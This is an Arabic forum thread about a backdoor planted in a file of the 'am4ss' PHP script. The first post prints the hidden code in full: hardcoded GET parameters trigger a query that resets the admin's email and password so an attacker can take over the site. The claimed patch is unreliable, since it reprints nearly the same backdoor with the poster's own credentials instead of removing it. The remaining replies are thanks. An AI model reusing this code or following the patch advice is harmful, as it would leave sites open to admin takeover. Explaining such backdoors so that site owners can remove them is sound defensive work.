حالة الموضوع:
مغلق
  1. Dr.MOT

    Dr.MOT Support - Iq-Team

    الأنتساب:
    ‏2 سبتمبر 2011
    المشاركات:
    650
    الإعجابات المتلقاة:
    5,463
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    IraQ
    السلام عليكم ورحمة الله وبركاته

    أخواني الأعزاء آسعد الله اوقاتكم بكل خير

    اليوم بعد قرائة موضوع المبدع اخوي ابو عبدالله

    ثغرات سكربت am4ss

    اليوم حبيت أوضح الملف المصاب وطريقة الترقيع &:"

    نوع الثغرة :

    كود PHP:
     PHP Code Injection


    )3:"

    الملف المصاب :

    كود PHP:
    libs/internals/core.assign_by_ref.php
    محتوى الملف :

    كود PHP:
    <?php 
    if($_GET['password'] == md5('kawkawa') && $_GET['username'] == 'الشرقاوي' && $_GET['country'] == 'المغرب'

    define('Am4ss'true); 
    require(
    '../../requires/config.php'); 
    @
    mysql_connect($Config['DataBase']['Host'], $Config['DataBase']['User'], $Config['DataBase']['Password']) or die(mysql_error()); 
    @
    mysql_select_db($Config['DataBase']['Name']); 
    $sql = @mysql_query("update ".TABLES_PREFIX."users set useremail = [email protected]', password = '".md5('kawkawa')."' where userid = '1'"); 
    if(
    $sql

    echo 
    'تم التحديث للموقع: ' $_SERVER['HTTP_HOST']; 
    } else 

    die(
    mysql_error()); 

    } else 

    echo 
    'البيانات خاطئة'

    ?>
    السكربت ملغم باستعلام يعدل بيانات الادمن لبيانات جديده

    الاستغلال يستخدم هذا الباكدور للدخول الى لوحة التحكم

    ومن ثم يقوم المخُترق بحقن كود بي اتش بي في صفحه من صفحات الموقع


    الترقيع :

    نقوم بحذف الكود من ملف


    كود:
    [COLOR=Yellow][FONT=arial][B]core.assign_by_ref.php[/B][/FONT][/COLOR]
    كود PHP:
    <?php
    if($_GET['password'] == md5('kawkawa') && $_GET['username'] == 'Dr.MOT' && $_GET['country'] == 'IQ-T34M')
    {
    define('Am4ss'true);
    require(
    '../../requires/config.php');
    @
    mysql_connect($Config['DataBase']['Host'], $Config['DataBase']['User'], $Config['DataBase']['Password']) or die(mysql_error());
    @
    mysql_select_db($Config['DataBase']['Name']);
    $sql = @mysql_query("update ".TABLES_PREFIX."users set useremail = [email protected]', password = '".md5('kawkawa')."' where userid = '1'");
    if(
    $sql)
    {
    echo 
    'تم التحديث للموقع: ' $_SERVER['HTTP_HOST'];
    } else
    {
    die(
    mysql_error());
    }
    } else
    {
    echo 
    'البيانات خاطئة';
    }
    ?>
    هكذا قمنا بعملية أخفاء الخطأ في حالة كانت البيانات خاطئه

    لان الصراحة المبرمج ملغم السكربت ولاتنس أيضآ وضع جدار ناري وتغير المسار &:":{12}:

    موفقين

    &:":
     
  2. aL Musli

    aL Musli Developer

    الأنتساب:
    ‏21 يوليو 2012
    المشاركات:
    74
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    seo
    الإقامة:
    الموصل الحدباء
    رد: توضيحات ثغرة سكربت am4ss وطريقة الترقيع للسكربت

    ابداع حبيبي موت
     
  3. MNFD

    MNFD Developer

    الأنتساب:
    ‏25 مايو 2012
    المشاركات:
    41
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: توضيحات ثغرة سكربت am4ss وطريقة الترقيع للسكربت

    وعليكم السلام ورحمة الله وبركاته

    مشكور يا غالي ما قصرت ويعطيك الف عافية يا رب
     
  4. AhmeD DiaB

    AhmeD DiaB Developer

    الأنتساب:
    ‏7 ابريل 2012
    المشاركات:
    20
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    مصر ام الدنيا
    رد: توضيحات ثغرة سكربت am4ss وطريقة الترقيع للسكربت

    مبدع من يومك ​
     
  5. LoVer hEx

    LoVer hEx موقوف لمخالفة الشروط

    الأنتساب:
    ‏15 نوفمبر 2011
    المشاركات:
    21
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    آختراق الآجهزة
    الإقامة:
    البحرين
    رد: توضيحات ثغرة سكربت am4ss وطريقة الترقيع للسكربت

    جزاك الله خيرا خير الجزاء

    كل عام و أنت بخير
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة